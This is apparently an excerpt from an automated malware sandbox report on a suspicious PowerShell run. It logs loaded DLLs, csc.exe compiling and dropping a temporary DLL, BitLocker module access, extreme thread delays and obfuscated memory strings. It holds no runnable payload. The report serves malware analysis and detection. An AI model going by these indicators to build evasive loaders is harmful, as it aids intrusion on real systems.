    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: @/"z.pdb source: powershell.exe, 00000000.00000002.2809800197.000001B2B46D0000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B87B6FB push esp; retf 0_2_00007FFD9B87B6FC
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B877967 push ebx; retf 0_2_00007FFD9B87796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B877513 push ebx; iretd 0_2_00007FFD9B87756A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B870952 push E95B7ED0h; ret 0_2_00007FFD9B8709C9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B94240C push 8B485F95h; iretd 0_2_00007FFD9B942411
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4166Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5657Jump to behavior
    Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 588Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -14757395258967632s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wVmBbPiVATyasIgjQjvfmfvuAnfHkvJexfMVrlqwolMlxOTkLSwHsNghgaloIPrwkgyyEaKVlAYkxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugq
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wyOEFfgIBueTlLcRlMxSybqddEdejeaWfuOUUraBIcSHtjLysMNPgtVlsXWsrBybCPEbfygSVuWlwIGMuxzxWjDMYyjHqaPORvgcqEMuncCfBKiFAhLjRkDT
    Source: ModuleAnalysisCache.0.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wwIGMuxzxWjDMYyjHqaPORvgcqEMuncCfBKiFAhLjRkDTWivCqHECEcGrqWDaWjBdsSDXlyZaEPrCJBoCimnIpcVtKaYBfRUkVORetKwlPKNANIoiLCSDGma
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wvCsbicoFBBevMciLqnDXZPTJDpnsYLFmTJgnFmkRMmrssAcHQbpwfUmgIjIrWsOLwcHqSocRhDtqAzDiuijcpCRkHSBbAiJWNFdJQWoqUGAWKPgQcQjzdzr
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugqXQRedYRFvuAtZEVqXkhAeegnlexqkwXwSuIwPJzzwwwOhdbObBVNMvydAMAzCtSYFAAGfoGeTgQ
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wPTJaDWAUeIOQdNXRjeQnXAwTTqzLeyabdymdyIiiAsyDLOWXbDpVDEKwQcAsyFyduqCbkcloPrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLC
